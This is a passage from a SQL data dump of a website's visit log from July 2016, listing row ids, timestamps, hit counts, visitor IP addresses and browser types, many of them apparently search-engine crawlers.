157.55.39.44','other'),(48411,1468218472,1,1,0,0,'130.193.37.7','other'),(48412,1468218666,1,1,0,0,'91.196.178.69','chrome'),(48413,1468218668,1,1,0,0,'141.8.142.67','other'),(48414,1468218669,1,1,0,0,'130.193.50.4','other'),(48415,1468218671,2,2,0,0,'178.154.189.31','other'),(48416,1468218709,1,1,0,0,'141.8.142.61','other'),(48417,1468219371,1,1,0,0,'141.8.142.25','other'),(48418,1468219433,1,1,0,0,'93.158.152.84','other'),(48419,1468219845,1,1,0,0,'5.255.253.55','other'),(48420,1468220151,1,1,0,0,'93.158.152.26','other'),(48421,1468220287,1,1,0,0,'94.179.18.46','firefox'),(48422,1468220561,1,1,0,0,'91.196.178.69','firefox'),(48423,1468220795,1,1,0,0,'91.207.244.74','chrome'),(48424,1468221534,1,1,0,0,'141.8.183.25','other'),(48425,1468221690,3,3,0,0,'130.193.50.34','other'),(48426,1468221707,1,1,0,0,'78.111.189.163','chrome'),(48427,1468222161,1,1,0,0,'93.158.152.61','other'),(48428,1468222399,1,0,1,0,'66.249.78.171',''),(48429,1468222506,1,1,0,0,'66.102.8.173','other'),(48430,1468223153,1,0,1,0,'66.249.78.164',''),(48431,1468223746,1,1,0,0,'91.196.177.15','chrome'),(48432,1468223852,1,1,0,0,'92.52.188.244','chrome'),(48433,1468223892,1,1,0,0,'46.200.253.44','other'),(48434,1468225161,1,1,0,0,'37.53.156.252','chrome'),(48435,1468225425,1,1,0,0,'93.158.152.84','other'),(48436,1468225428,1,1,0,0,'130.193.51.45','other'),(48437,1468225775,1,1,0,0,'130.193.50.4','other'),(48438,1468225900,1,1,0,0,'141.8.142.85','other'),(48439,1468226017,1,0,1,0,'66.249.78.136',''),(48440,1468226059,1,1,0,0,'141.8.142.67','other'),(48441,1468226061,1,1,0,0,'141.8.183.19','other'),(48442,1468226712,1,1,0,0,'180.76.15.153','other'),(48443,1468227561,1,1,0,0,'5.9.111.70','other'),(48444,1468227860,1,1,0,0,'5.255.253.67','other'),(48445,1468227861,1,1,0,0,'93.158.152.40','other'),(48446,1468228497,1,1,0,0,'130.193.50.34','other'),(48447,1468228501,1,1,0,0,'141.8.142.78','other'),(48448,1468228720,1,1,0,0,'180.76.15.136','other'),(48449,1468228933,1,1,0,0,'93.158.152.84','other'),(48450,1468228934,1,1,0,0,'130.193.51.79','other'),(48451,1468228936,1,1,0,0,'5.255.253.67','other'),(48452,1468229119,2,2,0,0,'93.158.152.51','other'),(48453,1468229753,1,1,0,0,'93.158.152.40','other'),(48454,1468230194,1,1,0,0,'91.196.178.70','firefox'),(48455,1468230425,1,1,0,0,'180.76.15.26','other'),(48456,1468230730,1,1,0,0,'180.76.15.141','other'),(48457,1468231766,1,1,0,0,'164.132.161.48','other'),(48458,1468232122,2,2,0,0,'93.158.152.40','other'),(48459,1468232123,1,1,0,0,'178.154.149.10','other'),(48460,1468232307,1,1,0,0,'93.158.152.51','other'),(48461,1468232551,2,2,0,0,'141.8.132.41','other'),(48462,1468232553,1,1,0,0,'141.8.132.52','other'),(48463,1468232675,1,1,0,0,'141.8.142.61','other'),(48464,1468233003,1,1,0,0,'178.95.203.98','opera'),(48465,1468233167,1,1,0,0,'178.219.194.4','firefox'),(48466,1468233389,2,0,2,0,'66.249.78.143',''),(48467,1468233393,1,1,0,0,'92.52.188.244','chrome'),(48468,1468233452,1,1,0,0,'93.158.152.51','other'),(48469,1468234393,1,1,0,0,'178.95.245.154','other'),(48470,1468234778,1,1,0,0,'217.77.220.55','firefox'),(48471,1468234822,2,2,0,0,'109.95.50.200','chrome'),(48472,1468234899,1,1,0,0,'193.227.231.193','msie'),(48473,1468235718,1,1,0,0,'141.8.183.19','other'),(48474,1468235872,1,1,0,0,'180.76.15.148','other'),(48475,1468235961,1,1,0,0,'141.8.183.25','other'),(48476,1468236038,1,0,1,0,'66.249.64.249',''),(48477,1468236146,1,1,0,0,'5.255.253.67','other'),(48478,1468236165,2,1,1,0,'66.249.78.171',''),(48479,1468236168,1,0,1,0,'66.249.78.178',''),(48480,1468236284,1,1,0,0,'176.67.16.71','chrome'),(48482,1468236285,1,1,0,0,'141.8.142.61','other'),(48483,1468236320,2,2,0,0,'93.158.152.84','other'),(48484,1468236626,1,1,0,0,'141.8.142.58','other'),(48485,1468236713,1,0,1,0,'66.249.78.150',''),(48486,1468236820,1,1,0,0,'46.200.227.96','chrome'),(48487,1468237235,1,1,0,0,'178.54.173.8','chrome'),(48488,1468237458,126,126,0,0,'51.254.121.188','other'),(48489,1468237601,2,0,2,0,'66.249.78.178',''),(48490,1468238541,1,1,0,0,'37.55.58.199','chrome'),(48491,1468238843,1,1,0,0,'130.193.51.79','other'),(48492,1468239195,1,1,0,0,'141.8.183.25','other'),(48493,1468239253,1,0,1,0,'66.249.78.143',''),(48494,1468239381,1,1,0,0,'141.8.142.67','other'),(48495,1468239548,1,1,0,0,'141.8.183.19','other'),(48496,1468239551,1,1,0,0,'141.8.142.88','other'),(48497,1468239668,1,1,0,0,'66.249.78.164','chrome'),(48498,1468239803,1,1,0,0,'207.46.13.109','other'),(48499,1468240293,1,1,0,0,'192.166.132.131','chrome'),(48500,1468240390,1,1,0,0,'91.196.178.69','firefox'),(48501,1468240784,2,2,0,0,'130.193.50.34','other'),(48502,1468241767,1,1,0,0,'164.132.161.14','other'),(48503,1468242333,1,1,0,0,'91.196.178.69','firefox'),(48504,1468242390,1,1,0,0,'141.8.183.25','other'),(48505,1468242475,4,4,0,0,'130.193.50.34','other'),(48506,1468243371,3,3,0,0,'141.8.183.25','other'),(48507,1468243461,1,1,0,0,'51.255.65.18','other'),(48508,1468243633,1,1,0,0,'94.178.7.27','chrome'),(48509,1468243741,1,1,0,0,'66.249.93.117','chrome'),(48510,1468244280,1,1,0,0,'91.196.178.72','firefox'),(48511,1468244723,1,1,0,0,'195.3.225.40','chrome'),(48512,1468244856,1,1,0,0,'91.124.217.180','chrome'),(48513,1468244890,1,1,0,0,'91.196.178.162','chrome'),(48514,1468245142,1,1,0,0,'141.8.183.25','other'),(48515,1468245180,1,1,0,0,'37.229.74.227','chrome'),(48516,1468245705,1,1,0,0,'91.196.178.70','firefox'),(48517,1468246319,1,1,0,0,'93.171.172.136','chrome'),(48518,1468246496,1,1,0,0,'91.196.177.69','chrome'),(48519,1468246679,1,1,0,0,'91.196.178.101','chrome'),(48520,1468247034,1,1,0,0,'37.52.16.48','chrome'),(48521,1468248281,1,1,0,0,'37.52.16.48','chrome'),(48522,1468248342,2,0,2,0,'66.249.78.171',''),(48523,1468248420,1,1,0,0,'51.255.51.25','other'),(48524,1468249073,1,1,0,0,'141.8.142.58','other'),(48525,1468249506,1,1,0,0,'130.193.51.19','other'),(48526,1468249923,2,2,0,0,'130.193.50.34','other'),(48527,1468249924,1,1,0,0,'93.158.152.84','other'),(48528,1468250154,1,0,1,0,'66.249.78.164',''),(48529,1468250456,2,2,0,0,'130.193.51.19','other'),(48530,1468250787,1,0,1,0,'66.249.78.171',''),(48531,1468250933,4,4,0,0,'141.8.183.25','other'),(48532,1468251082,1,0,1,0,'66.249.78.136',''),(48533,1468251285,3,3,0,0,'130.193.50.34','other'),(48534,1468252230,1,1,0,0,'180.76.15.16','other'),(48535,1468253168,1,1,0,0,'52.3.127.144','other'),(48536,1468253346,1,1,0,0,'207.46.13.58','other'),(48537,1468253931,2,2,0,0,'130.193.50.34','other'),(48538,1468254055,1,1,0,0,'207.46.13.109','other'),(48539,1468254713,1,0,1,0,'66.249.78.171',''),(48540,1468254719,1,1,0,0,'91.198.143.122','chrome'),(48541,1468254800,1,1,0,0,'91.124.239.224','firefox'),(48542,1468255110,2,2,0,0,'130.193.51.19','other'),(48543,1468255238,1,1,0,0,'141.8.183.25','other'),(48544,1468255495,1,0,1,0,'66.249.78.164',''),(48545,1468256663,1,1,0,0,'46.42.178.3','msie'),(48546,1468257206,1,1,0,0,'91.196.178.35','firefox'),(48547,1468257403,1,0,1,0,'66.249.78.171',''),(48548,1468257742,1,1,0,0,'46.188.34.120','msie'),(48549,1468257885,1,1,0,0,'66.249.75.207','chrome'),(48550,1468258349,1,0,1,0,'66.249.78.164',''),(48551,1468258629,1,1,0,0,'91.196.178.69','firefox'),(48552,1468259388,1,1,0,0,'157.55.39.44','other'),(48553,1468259556,1,0,1,0,'66.249.78.164',''),(48554,1468261261,1,1,0,0,'178.6.246.231','other'),(48555,1468262331,1,0,1,0,'66.249.78.171',''),(48556,1468263326,1,0,1,0,'66.249.78.164',''),(48557,1468263913,4,4,0,0,'51.255.36.87','other'),(48558,1468264605,1,1,0,0,'91.196.178.69','chrome'),(48559,1468265118,1,0,1,0,'66.249.78.150',''),(48560,1468265479,1,0,1,0,'66.249.78.171',''),(48561,1468266300,1,1,0,0,'157.55.39.63','other'),(48562,1468267253,1,1,0,0,'178.95.118.67','chrome'),(48563,1468267954,1,1,0,0,'178.95.245.154','other'),(48564,1468268469,1,1,0,0,'51.255.65.95','other'),(48565,1468268482,1,1,0,0,'141.8.183.25','other'),(48566,1468268682,1,1,0,0,'51.255.65.89','other'),(48567,1468271364,1,0,1,0,'66.249.78.164',''),(48568,1468272243,1,0,1,0,'66.249.78.178',''),(48569,1468272281,1,1,0,0,'151.80.31.105','other'),(48570,1468272994,1,1,0,0,'66.249.78.171','chrome'),(48571,1468274026,1,0,1,0,'66.249.78.178',''),(48572,1468275559,1,1,0,0,'130.193.51.19','other'),(48573,1468276622,1,1,0,0,'164.132.161.22','other'),(48574,1468277199,1,1,0,0,'66.249.78.230','chrome'),(48575,1468277913,1,1,0,0,'164.132.161.29','other'),(48576,1468278057,1,0,1,0,'66.249.78.171',''),(48577,1468279115,1,1,0,0,'141.8.183.25','other'),(48578,1468279864,1,1,0,0,'180.76.15.147','other'),(48579,1468279880,1,1,0,0,'130.193.50.34','other'),(48580,1468281636,1,1,0,0,'130.193.50.34','other'),(48581,1468281641,1,1,0,0,'141.8.183.25','other'),(48582,1468282875,2,0,2,0,'66.249.78.178',''),(48583,1468283269,3,3,0,0,'130.193.50.34','other'),(48584,1468286075,1,1,0,0,'51.255.65.91','other'),(48585,1468287210,1,1,0,0,'151.80.31.160','other'),(48586,1468290894,1,1,0,0,'180.76.15.24','other'),(48587,1468291302,1,1,0,0,'164.132.161.69','other'),(48588,1468291811,1,1,0,0,'151.80.31.173','other'),(48589,1468293207,1,1,0,0,'91.124.239.224','other'),(48590,1468294194,1,1,0,0,'91.124.239.224','other'),(48591,1468295399,1,1,0,0,'130.193.50.34','other'),(48592,1468295574,1,1,0,0,'164.132.161.45','other'),(48593,1468295600,1,1,0,0,'164.132.161.64','other'),(48594,1468295934,1,1,0,0,'91.196.178.163','other'),(48595,1468300128,1,0,1,0,'66.249.78.178',''),(48596,1468300387,1,1,0,0,'91.196.179.33','firefox'),(48597,1468300607,2,2,0,0,'91.194.84.106','other'),(48598,1468300988,1,1,0,0,'180.76.15.141','other'),(48599,1468301706,1,1,0,0,'91.196.178.35','firefox'),(48600,1468301967,1,1,0,0,'188.32.129.189','msie'),(48601,1468302187,1,1,0,0,'188.232.119.69','msie'),(48602,1468302452,2,2,0,0,'130.193.50.34','other'),(48603,1468302660,1,1,0,0,'37.54.17.86','chrome'),(48604,1468303286,2,2,0,0,'91.196.178.69','firefox'),(48605,1468304997,1,1,0,0,'91.196.177.15','chrome'),(48606,1468305637,1,1,0,0,'91.196.178.167','chrome'),(48607,1468306115,3,3,0,0,'130.193.50.34','other'),(48608,1468306165,1,1,0,0,'51.255.65.65','other'),(48609,1468306177,1,1,0,0,'37.146.206.223','msie'),(48610,1468306370,1,1,0,0,'51.255.65.85','other'),(48611,1468306499,1,1,0,0,'164.132.161.29','other'),(48612,1468306864,1,1,0,0,'130.193.51.19','other'),(48613,1468306974,1,1,0,0,'164.132.161.23','other'),(48614,1468307172,2,2,0,0,'130.193.50.34','other'),(48615,1468307876,1,0,1,0,'66.249.78.178',''),(48616,1468308035,1,1,0,0,'91.196.178.132','firefox'),(48617,1468308411,1,1,0,0,'91.196.178.71','chrome'),(48618,1468308971,1,1,0,0,'130.193.50.34','other'),(48619,1468309192,1,1,0,0,'66.249.78.171','chrome'),(48620,1468310501,1,1,0,0,'93.73.234.193','firefox'),(48621,1468310551,1,1,0,0,'37.53.231.114','firefox'),(48622,1468310732,1,1,0,0,'31.128.100.166','chrome'),(48623,1468310874,1,1,0,0,'82.145.221.194','chrome'),(48624,1468311437,1,0,1,0,'66.249.78.164',''),(48625,1468311805,1,1,0,0,'130.180.211.113','chrome'),(48626,1468312014,1,1,0,0,'91.196.178.69','firefox'),(48627,1468312070,1,1,0,0,'91.196.178.99','firefox'),(48628,1468312527,1,1,0,0,'180.76.15.143','other'),(48629,1468312558,1,1,0,0,'82.207.91.234','firefox'),(48630,1468312688,1,0,1,0,'66.249.78.164',''),(48631,1468313672,1,1,0,0,'130.193.50.34','other'),(48632,1468314354,2,2,0,0,'141.8.183.25','other'),(48633,1468314536,1,1,0,0,'180.76.15.144','other'),(48634,1468314985,1,1,0,0,'195.211.212.33','chrome'),(48635,1468316013,1,1,0,0,'91.196.178.71','chrome'),(48636,1468316190,1,0,1,0,'66.249.78.164',''),(48637,1468316367,1,0,1,0,'66.249.78.171',''),(48638,1468316696,1,1,0,0,'78.111.190.58','chrome'),(48639,1468316949,1,1,0,0,'164.132.161.69','other'),(48640,1468317245,1,1,0,0,'141.8.183.25','other'),(48641,1468317523,1,1,0,0,'130.193.50.34','other'),(48642,1468318211,1,1,0,0,'178.92.45.234','chrome'),(48643,1468318428,1,0,1,0,'66.249.78.164',''),(48644,1468319504,2,2,0,0,'130.193.50.34','other'),(48645,1468319661,1,1,0,0,'95.135.49.122','chrome'),(48646,1468319699,1,1,0,0,'141.8.183.25','other'),(48647,1468320299,1,1,0,0,'178.93.40.148','chrome'),(48648,1468320938,1,0,1,0,'66.249.78.171',''),(48649,1468321871,1,0,1,0,'66.249.78.178',''),(48650,1468322220,1,1,0,0,'95.133.238.156','chrome'),(48651,1468322294,1,0,1,0,'66.249.78.164',''),(48652,1468322333,1,0,1,0,'66.249.78.171',''),(48653,1468322399,1,1,0,0,'37.53.227.17','chrome'),(48654,1468322943,1,1,0,0,'195.211.212.33','chrome'),(48655,1468323187,1,1,0,0,'141.8.183.25','other'),(48656,1468323501,1,1,0,0,'208.115.113.82','other'),(48657,1468323613,2,2,0,0,'130.193.50.34','other'),(48658,1468324820,1,0,1,0,'66.249.78.150',''),(48659,1468325005,1,1,0,0,'91.196.178.168','chrome'),(48660,1468325009,1,1,0,0,'95.135.39.238','firefox'),(48661,1468325379,1,1,0,0,'212.1.108.142','firefox'),(48662,1468326907,1,1,0,0,'94.179.50.180','chrome'),(48663,1468326969,1,1,0,0,'151.80.31.109','other'),(48664,1468327105,1,1,0,0,'130.193.50.34','other'),(48665,1468328121,1,1,0,0,'91.196.178.66','chrome'),(48666,1468328626,1,1,0,0,'212.1.108.142','firefox'),(48667,1468328766,1,1,0,0,'94.178.112.38','chrome'),(48668,1468328829,1,1,0,0,'180.76.15.151','other'),(48669,1468328854,1,1,0,0,'164.132.161.37','other'),(48670,1468329497,1,0,1,0,'66.249.78.136',''),(48671,1468329671,3,3,0,0,'37.26.39.41','other'),(48672,1468329807,1,1,0,0,'91.196.178.68','firefox'),(48673,1468329994,1,1,0,0,'51.255.65.44','other'),(48674,1468330451,1,1,0,0,'94.231.188.10','firefox'),(48675,1468330585,1,1,0,0,'51.255.65.39','other'),(48676,1468330605,1,1,0,0,'207.46.13.181','other'),(48677,1468330656,1,1,0,0,'51.255.65.58','other'),(48678,1468332192,1,1,0,0,'94.179.108.49','firefox'),(48679,1468332307,1,1,0,0,'164.132.161.32','other'),(48680,1468333768,1,1,0,0,'66.249.93.113','chrome'),(48681,1468334114,1,1,0,0,'141.8.183.25','other'),(48682,1468334453,1,1,0,0,'141.8.142.67','other'),(48683,1468337169,1,1,0,0,'180.76.15.151','other'),(48684,1468337264,1,1,0,0,'91.124.239.224','firefox'),(48685,1468337691,1,1,0,0,'195.162.90.62','chrome'),(48686,1468337870,1,1,0,0,'141.8.142.58','other'),(48687,1468338161,1,1,0,0,'91.196.178.69','firefox'),(48688,1468338258,4,4,0,0,'130.193.50.34','other'),(48689,1468338662,1,1,0,0,'130.193.51.19','other'),(48690,1468339956,1,1,0,0,'164.132.161.11','other'),(48691,1468340462,1,0,1,0,'66.249.78.178',''),(48692,1468341691,1,1,0,0,'130.193.50.34','other'),(48693,1468342249,1,1,0,0,'141.8.183.25','other'),(48694,1468342695,1,1,0,0,'141.8.142.61','other'),(48695,1468343110,1,1,0,0,'164.132.161.34','other'),(48696,1468345465,1,1,0,0,'141.8.183.19','other'),(48697,1468345588,1,1,0,0,'141.8.183.25','other'),(48698,1468345714,1,0,1,0,'66.249.78.178',''),(48699,1468345930,1,0,1,0,'66.249.78.136',''),(48700,1468346036,1,1,0,0,'46.147.126.219','msie'),(48701,1468347334,1,1,0,0,'91.124.239.224','firefox'),(48702,1468347413,1,1,0,0,'94.179.74.81','firefox'),(48703,1468347942,1,1,0,0,'91.76.234.22','msie'),(48704,1468349436,1,1,0,0,'93.158.152.26','other'),(48705,1468349578,1,1,0,0,'51.255.65.62','other'),(48706,1468349890,1,1,0,0,'164.132.161.38','other'),(48707,1468350520,1,1,0,0,'91.196.178.67','firefox'),(48708,1468351450,1,1,0,0,'51.255.65.34','other'),(48709,1468352076,1,1,0,0,'164.132.161.70','other'),(48710,1468352826,1,1,0,0,'193.194.127.217','firefox'),(48711,1468353169,1,1,0,0,'130.193.50.6','other'),(48712,1468354664,1,1,0,0,'91.124.239.224','firefox'),(48713,1468355318,2,0,2,0,'66.249.78.171',''),(48714,1468355427,1,1,0,0,'5.255.253.47','other'),(48715,1468355520,1,0,1,0,'66.249.78.150',''),(48716,1468356175,1,1,0,0,'141.8.132.30','other'),(48717,1468356468,1,1,0,0,'93.158.152.40','other'),(48718,1468356727,1,1,0,0,'130.193.50.34','other'),(48719,1468356987,1,0,1,0,'66.249.78.171',''),(48720,1468357511,1,1,0,0,'46.211.252.185','chrome'),(48721,1468358292,3,3,0,0,'130.193.50.34','other'),(48722,1468358453,1,1,0,0,'141.8.142.67','other'),(48723,1468358470,1,1,0,0,'91.196.178.35','firefox'),(48724,1468358836,1,1,0,0,'130.193.51.19','other'),(48725,1468359267,2,2,0,0,'141.8.183.25','other'),(48726,1468359656,1,1,0,0,'130.193.50.34','other'),(48727,1468359938,1,1,0,0,'128.68.220.34','msie'),(48728,1468359945,1,1,0,0,'95.220.203.28','msie'),(48729,1468359946,1,1,0,0,'176.193.242.53','msie'),(48730,1468359947,1,1,0,0,'2.93.159.83','msie'),(48731,1468359952,1,1,0,0,'95.24.56.121','msie'),(48732,1468360076,1,1,0,0,'207.46.13.103','other'),(48733,1468360915,1,1,0,0,'180.76.15.157','other'),(48734,1468361221,1,1,0,0,'69.30.198.178','other'),(48735,1468362523,1,0,1,0,'66.249.78.178',''),(48736,1468364396,2,0,2,0,'66.249.78.171',''),(48737,1468364612,1,0,1,0,'66.249.78.164',''),(48738,1468366562,5,0,5,0,'68.180.230.178',''),(48739,1468366889,2,2,0,0,'141.8.183.25','other'),(48740,1468367409,4,4,0,0,'130.193.50.34','other'),(48741,1468367536,2,0,2,0,'68.180.230.178',''),(48742,1468368106,3,3,0,0,'141.8.183.25','other'),(48743,1468368881,1,1,0,0,'141.8.142.61','other'),(48744,1468369041,2,2,0,0,'141.8.183.25','other'),(48745,1468369180,1,1,0,0,'130.193.50.34','other'),(48746,1468370876,1,1,0,0,'141.8.183.25','other'),(48747,1468373131,1,1,0,0,'180.76.15.163','other'),(48748,1468373365,1,1,0,0,'130.193.50.34','other'),(48749,1468375487,14,14,0,0,'37.157.193.84','other'),(48750,1468376735,2,2,0,0,'130.193.50.34','other'),(48751,1468377079,1,1,0,0,'141.8.183.25','other'),(48752,1468378364,1,1,0,0,'130.193.51.19','other'),(48753,1468378944,3,3,0,0,'130.193.50.34','other'),(48754,1468379058,1,1,0,0,'40.77.167.23','other'),(48755,1468379411,3,3,0,0,'141.8.183.25','other'),(48756,1468381732,1,1,0,0,'164.132.161.77','other'),(48757,1468383078,1,1,0,0,'130.193.50.34','other'),(48758,1468383518,1,1,0,0,'176.77.20.122','msie'),(48759,1468383879,1,1,0,0,'37.110.37.49','msie'),(48760,1468383990,1,1,0,0,'89.178.100.26','msie'),(48761,1468385240,1,1,0,0,'138.201.127.112','other'),(48762,1468385290,1,1,0,0,'130.193.50.34','other'),(48763,1468386104,1,1,0,0,'157.55.39.161','other'),(48764,1468386207,1,1,0,0,'93.80.233.149','chrome'),(48765,1468386208,1,1,0,0,'37.204.41.142','opera'),(48767,1468386212,1,1,0,0,'37.204.41.156','opera'),(48768,1468387420,1,1,0,0,'180.76.15.12','other'),(48769,1468388740,1,1,0,0,'188.32.41.246','msie'),(48770,1468389040,1,1,0,0,'51.255.65.33','other'),(48771,1468389223,1,1,0,0,'128.73.21.164','msie'),(48772,1468389443,1,0,1,0,'66.249.78.171',''),(48773,1468389628,1,1,0,0,'91.196.178.70','firefox'),(48774,1468389896,1,0,1,0,'66.249.78.164',''),(48775,1468390285,1,1,0,0,'95.108.133.193','chrome'),(48776,1468390310,1,1,0,0,'130.193.50.34','other'),(48777,1468390743,1,1,0,0,'91.196.177.94','firefox'),(48778,1468390820,1,1,0,0,'195.211.175.123','chrome'),(48779,1468390867,1,1,0,0,'178.92.179.108','chrome'),(48780,1468390984,1,0,1,0,'66.249.78.178',''),(48781,1468391187,1,1,0,0,'37.55.43.114','chrome'),(48782,1468391683,1,1,0,0,'51.255.65.91','other'),(48783,1468391881,1,1,0,0,'91.196.178.135','chrome'),(48784,1468391978,1,1,0,0,'94.179.115.32','chrome'),(48785,1468392155,1,1,0,0,'157.55.39.37','other'),(48786,1468392225,1,1,0,0,'92.112.5.24','chrome'),(48787,1468392422,1,1,0,0,'66.249.93.109','chrome'),(48788,1468392506,1,1,0,0,'37.52.16.21','firefox'),(48789,1468392873,1,1,0,0,'195.137.245.172','chrome'),(48790,1468392967,1,1,0,0,'94.179.25.13','chrome'),(48791,1468393732,1,1,0,0,'51.255.65.56','other'),(48792,1468394091,1,1,0,0,'91.196.177.15','chrome'),(48793,1468394174,1,0,1,0,'66.249.64.155',''),(48794,1468394584,1,1,0,0,'195.211.212.33','chrome'),(48795,1468395698,4,4,0,0,'151.80.44.115','other'),(48796,1468396315,1,0,1,0,'66.249.78.150',''),(48797,1468397495,1,0,1,0,'66.249.78.164',''),(48798,1468398348,1,1,0,0,'95.133.46.99','chrome'),(48799,1468398681,1,1,0,0,'164.132.161.80','other'),(48800,1468399881,1,1,0,0,'157.55.39.194','other'),(48801,1468400104,1,1,0,0,'95.132.4.9','opera'),(48802,1468400159,1,1,0,0,'130.193.50.34','other'),(48803,1468400893,1,1,0,0,'195.162.90.62','chrome'),(48804,1468401274,1,0,1,0,'66.249.78.171',''),(48805,1468401289,1,1,0,0,'37.73.237.2','other'),(48806,1468401873,1,1,0,0,'195.162.90.62','chrome'),(48807,1468402920,1,1,0,0,'151.80.31.158','other'),(48808,1468403470,1,0,1,0,'66.249.78.143',''),(48809,1468404078,1,1,0,0,'91.196.178.169','chrome'),(48810,1468404388,4,4,0,0,'130.193.50.34','other'),(48811,1468404549,1,1,0,0,'141.8.142.61','other'),(48812,1468404576,1,1,0,0,'31.43.18.162','chrome'),(48813,1468404733,1,1,0,0,'141.8.142.58','other'),(48814,1468404969,1,1,0,0,'130.193.51.19','other'),(48815,1468405123,1,0,1,0,'66.249.78.143',''),(48817,1468405269,1,1,0,0,'141.8.183.25','other'),(48818,1468405419,1,1,0,0,'141.8.183.19','other'),(48819,1468405459,1,0,1,0,'66.249.78.178',''),(48820,1468406804,1,1,0,0,'91.196.178.169','chrome'),(48821,1468408029,1,1,0,0,'94.179.125.200','opera'),(48822,1468408202,1,1,0,0,'180.76.15.23','other'),(48823,1468408393,1,0,1,0,'66.249.78.164',''),(48824,1468408593,1,1,0,0,'46.219.18.132','chrome'),(48825,1468408745,1,1,0,0,'91.196.178.134','firefox'),(48827,1468408783,1,1,0,0,'66.102.9.93','chrome'),(48829,1468408784,1,1,0,0,'31.13.109.118','other'),(48830,1468410036,1,1,0,0,'91.196.178.167','chrome'),(48831,1468410054,1,1,0,0,'46.200.112.138','firefox'),(48832,1468410065,1,1,0,0,'46.219.246.221','chrome'),(48833,1468410100,1,1,0,0,'213.174.11.139','firefox'),(48834,1468410515,1,1,0,0,'91.196.177.94','firefox'),(48835,1468410869,1,1,0,0,'51.255.65.9','other'),(48836,1468410914,1,1,0,0,'164.132.161.39','other'),(48837,1468411053,1,0,1,0,'66.249.78.178',''),(48838,1468411075,1,0,1,0,'68.180.230.178',''),(48839,1468411152,1,1,0,0,'91.196.178.167','chrome'),(48840,1468411751,1,1,0,0,'51.255.65.73','other'),(48841,1468411774,1,0,1,0,'66.249.78.164',''),(48842,1468411961,1,1,0,0,'91.196.178.40','firefox'),(48843,1468412170,1,1,0,0,'91.196.178.66','firefox'),(48844,1468412221,1,1,0,0,'180.76.15.15','other'),(48845,1468412728,1,1,0,0,'141.8.142.61','other'),(48846,1468413123,1,1,0,0,'37.53.122.37','chrome'),(48847,1468413166,1,1,0,0,'141.8.183.25','other'),(48848,1468413182,1,1,0,0,'91.196.178.134','firefox'),(48849,1468413326,1,1,0,0,'46.201.77.239','firefox'),(48850,1468413340,1,1,0,0,'176.77.31.102','chrome'),(48851,1468413341,1,1,0,0,'176.195.178.41','opera'),(48852,1468413344,1,1,0,0,'37.204.41.156','opera'),(48854,1468413345,1,1,0,0,'95.24.151.168','firefox'),(48855,1468413625,1,1,0,0,'69.30.213.138','other'),(48856,1468413792,1,0,1,0,'68.180.230.178',''),(48857,1468414007,1,1,0,0,'37.73.201.16','chrome'),(48858,1468414163,1,1,0,0,'178.95.197.115','other'),(48859,1468415493,1,1,0,0,'95.135.34.148','opera'),(48860,1468416524,1,1,0,0,'178.92.179.108','chrome'),(48861,1468417169,1,1,0,0,'91.233.49.254','chrome'),(48862,1468417432,1,1,0,0,'178.95.197.115','firefox'),(48863,1468418015,1,1,0,0,'180.76.15.26','other'),(48864,1468418035,21,21,0,0,'144.76.7.107','other'),(48865,1468418353,1,1,0,0,'178.93.232.52','chrome'),(48866,1468418439,1,1,0,0,'91.196.178.166','chrome'),(48867,1468418599,1,0,1,0,'66.249.78.171',''),(48868,1468418784,1,1,0,0,'194.44.253.58','chrome'),(48869,1468418912,1,1,0,0,'151.80.31.164','other'),(48870,1468419308,1,1,0,0,'164.132.161.30','other'),(48871,1468419495,1,1,0,0,'40.77.167.83','other'),(48872,1468419846,1,1,0,0,'46.201.77.239','firefox'),(48873,1468420236,1,1,0,0,'95.134.170.240','chrome'),(48874,1468420239,3,3,0,0,'180.153.214.189','other'),(48875,1468420246,1,1,0,0,'180.153.206.32','chrome'),(48876,1468420374,1,1,0,0,'51.255.65.8','other'),(48877,1468422038,1,1,0,0,'193.194.127.217','firefox'),(48878,1468423342,1,1,0,0,'91.196.178.65','firefox'),(48879,1468425963,1,1,0,0,'151.80.31.155','other'),(48880,1468426407,1,0,1,0,'66.249.78.164',''),(48881,1468426503,1,1,0,0,'95.25.193.132','msie'),(48882,1468426529,1,1,0,0,'130.193.50.34','other'),(48883,1468426639,1,1,0,0,'176.77.101.128','msie'),(48884,1468426702,1,1,0,0,'188.32.144.196','msie'),(48885,1468427516,1,1,0,0,'51.255.65.28','other'),(48886,1468427917,1,1,0,0,'95.221.243.124','msie'),(48887,1468429370,1,1,0,0,'207.46.13.97','other'),(48888,1468430806,1,1,0,0,'51.255.65.78','other'),(48889,1468431434,1,1,0,0,'94.179.67.21','firefox'),(48890,1468432093,1,1,0,0,'51.255.65.20','other'),(48891,1468432283,1,1,0,0,'207.46.13.165','other'),(48892,1468432580,1,1,0,0,'207.46.13.191','other'),(48893,1468433035,1,1,0,0,'51.255.65.78','other'),(48894,1468434793,1,1,0,0,'91.196.178.69','chrome'),(48895,1468435190,1,1,0,0,'51.255.65.38','other'),(48896,1468437052,1,1,0,0,'207.46.13.172','other'),(48897,1468437116,1,1,0,0,'36.78.189.64','firefox'),(48898,1468437423,1,1,0,0,'91.196.178.131','other'),(48899,1468439752,2,2,0,0,'159.224.216.84','chrome'),(48900,1468440439,1,1,0,0,'164.132.161.7','other'),(48901,1468440632,1,1,0,0,'91.124.239.224','firefox'),(48902,1468441209,1,1,0,0,'207.46.13.191','other'),(48903,1468444198,1,1,0,0,'164.132.161.40','other'),(48904,1468444200,1,1,0,0,'91.196.178.163','chrome'),(48905,1468444479,1,1,0,0,'180.76.15.149','other'),(48906,1468445972,1,1,0,0,'207.46.13.40','other'),(48907,1468447834,1,1,0,0,'164.132.161.65','other'),(48908,1468447861,1,1,0,0,'64.246.165.140','firefox'),(48909,1468449939,1,1,0,0,'207.46.13.106','other'),(48910,1468452608,1,1,0,0,'180.76.15.141','other'),(48911,1468454314,1,1,0,0,'51.255.65.39','other'),(48912,1468459614,1,1,0,0,'180.76.15.14','other'),(48913,1468462715,1,1,0,0,'51.255.65.39','other'),(48914,1468463196,1,1,0,0,'164.132.161.77','other'),(48915,1468463970,1,1,0,0,'207.46.13.106','other'),(48916,1468464660,1,1,0,0,'207.46.13.59','other'),(48917,1468468249,1,1,0,0,'151.80.31.103','other'),(48918,1468470619,1,1,0,0,'66.102.9.103','chrome'),(48919,1468471105,1,1,0,0,'207.46.13.53','other'),(48920,1468471671,1,1,0,0,'37.53.214.96','chrome'),(48921,1468471690,1,1,0,0,'180.76.15.162','other'),(48922,1468471692,1,1,0,0,'180.76.15.9','other'),(48923,1468472062,1,1,0,0,'91.196.178.72','firefox'),(48924,1468472515,1,0,1,0,'66.249.78.1